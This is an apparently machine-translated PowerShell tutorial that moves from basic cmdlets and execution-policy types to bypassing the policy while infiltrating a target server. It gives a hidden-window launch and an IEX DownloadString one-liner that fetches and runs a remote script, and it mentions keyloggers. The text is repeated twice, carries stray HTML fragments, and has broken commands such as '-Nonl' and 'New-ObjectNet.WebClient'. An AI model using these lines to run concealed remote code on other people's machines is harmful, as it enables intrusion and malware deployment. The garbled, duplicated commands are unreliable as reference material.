Windows powershell is a command-line shell and scripting environment, which is built into the operating system of win7 and above, so that command-line users and script writers can take advantage of the powerful functions of the .NET Framework. The powershell program can run directly in the memory and can be used as an extension of the command prompt cmd.exe.
View powershell version information
Get-Host or $PSVersionTable.PSVersion
Basic concepts
1. .ps1 file< /div>
A powershell script is actually a simple text file containing multiple powershell commands, and each command is displayed as a separate line.
2. Execution strategy
To prevent malicious scripts from running, powershell has an execution strategy, which is set to restricted by default.
When the powershell script cannot be executed, you can use the following cmdlet command to determine the current execution strategy.
Get-ExecutionPolicy
3. Run the script
C:\test\1.ps1
.\ 2. ps1
4. Pipe
The output of the previous command is used as the input of the next command
Assuming that all current needs to be stopped Programs starting with “p”
get-process p* | stop-process
1. Basic commands
div>
Take file operation as an example
1. New directory
New-Item whitecellclub-ItemType Directory
2. New file
New-Item light.txt-ItemType File
3. Delete directory
Remove-Item whitecellclub
4. Display file content
Get-Content test.txt
5. Set the text content
Set-Content test.txt-Value “Hello World!”
6. Add content
Add-Content light.txt-Value “i love you”
7. Clear content
Clear-Content test.txt
2. Execution strategy
Get execution strategy
Get-ExecutionPolicy
The strategies are divided into the following types:
Restricted: The script cannot be executed (default)
RemoteSigned: Scripts created locally can be run, but scripts downloaded from the Internet cannot be run (except those signed by a digital certificate).
AllSigned: Only run when the script is signed by a trusted publisher.
Unrestricted: Allow all scripts to run
You can use the following command format to set the PowerShell execution policy
< div>
In the command line, enter powershell to enter the powershell command line, and enter help to view the help information.
< div> 3. Execute the script by bypassing the policy
If you want to run the PowerShell script, you must change the Restricted policy to Unrestricted with administrator privileges. Therefore, when infiltrating, you need to use some methods to bypass the policy. Execute the script
1. Bypass the local authority execution
Upload xxx.ps1 to the target server, and execute the script locally on the target server in the CMD environment
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2. Local hidden bypass permission execution script
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3. Use IEX to download remote PS1 scripts to bypass permission execution
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl IEX (New-ObjectNet.WebClient).DownloadString(“xxx.ps1”);[Parameters ]
The parameter description of the above command:
ExecutionPolicy Bypass: Bypass the execution security policy. This parameter is very important. By default, PowerShell is safe The policy stipulates that PowerShell does not allow running commands and files. By setting this parameter, any security rule can be bypassed. In penetration testing, this parameter is basically used every time a PowerShell script is run.
WindowStyle Hidden: hide the window
NoLogo: start PowerShell without displaying the copyright logo
NonInteractive (-Nonl): non-interactive mode, Po
werShell does not provide users with interactive prompts
NoProfile (-Nop): PowerShell console does not load the current user’s profile
Noexit: Does not exit the Shell after execution. This is very important when using scripts such as keyloggers.
PowerShell scripts cannot be run directly by default. In this case, you can use the above three methods to bypass the security policy and run PowerShell scripts.
Windows Powershell is a command line shell program and script environment, which is built into the operating system of win7 and above, so that command line users and script writers can take advantage of the powerful functions of the .NET Framework. The powershell program can run directly in the memory and can be used as an extension of the command prompt cmd.exe.
View powershell version information
Get-Host or $PSVersionTable.PSVersion
Basic concepts
1. .ps1 file< /p>
A powershell script is actually a simple text file containing multiple powershell commands, and each command is displayed as a separate line.
2. Execution strategy
In order to prevent malicious scripts from running, powershell has an execution strategy, which is set to restricted by default.
When the powershell script cannot be executed, you can use the following cmdlet command to determine the current execution strategy.
Get-ExecutionPolicy
3. Run the script
C :\test\1.ps1
.\2.ps1
4. Pipe
The output of the previous command is used as the back The input of a command
Suppose you need to stop all current programs starting with “p”
get-process p* | stop-process
1. Basic commands
Take file operations as an example
1. New directory
New-Item whitecellclub-ItemType Directory
2. New file
New-Item light.txt-ItemType File
3. Delete directory
Remove-Item whitecellclub
4. Display the content of the file
Get-Content test.txt
5. Set the text content
Set-Content test.txt -Value”Hello World!”
6. Add content
Add-Content light.txt-Value”i love you”
7. Clear content< /p>
Clear-Content test.txt
Second, execution strategy
Get execution strategy
Get-ExecutionPolicy
The strategies are divided into the following types:
Restricted: scripts cannot be executed (default)
RemoteSigned: scripts created locally can be run, but scripts downloaded from the Internet Cannot run (except for those signed by a digital certificate).
AllSigned: Only run when the script is signed by a trusted publisher.
Unrestricted: Allow all scripts to run
You can use the following command format to set the PowerShell execution policy
Set-ExecutionPolicy
< p>
Enter powershell on the command line to enter the powershell command line, and enter help to view the help information.
< p>3. Execute the script by bypassing the policy
If you want to run the PowerShell script, you must change the Restricted policy to Unrestricted with administrator privileges. Therefore, when infiltrating, you need to use some methods to bypass the policy. Execute script
1. Bypass local permission execution
Upload xxx.ps1 to the target server, and execute the script locally on the target server in the CMD environment
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2. Local hidden bypass permission execution script
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3. Use IEX to download remote PS1 scripts to bypass permission execution
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl IEX (New-ObjectNet.WebClient).DownloadString(“xxx.ps1”);[Parameters]
The parameter description of the above command:
ExecutionPolicy Bypass : Bypass the implementation of security policy, this parameter is very important, by default, the PowerShell security The overall policy stipulates that PowerShell does not allow running commands and files. By setting this parameter, any security rule can be bypassed. In penetration testing, this parameter is basically used every time a PowerShell script is run.
WindowStyle Hidden: hide the window
NoLogo: start PowerShell without displaying the copyright logo
NonInteractive (-Nonl): non-interactive mode, Po
werShell does not provide users with interactive prompts
NoProfile (-Nop): PowerShell console does not load the current user’s profile
Noexit: does not exit the Shell after execution. This is very important when using scripts such as keyloggers.
PowerShell scripts cannot be run directly by default. At this time, you can use the above three methods to bypass the security policy and run PowerShell scripts.
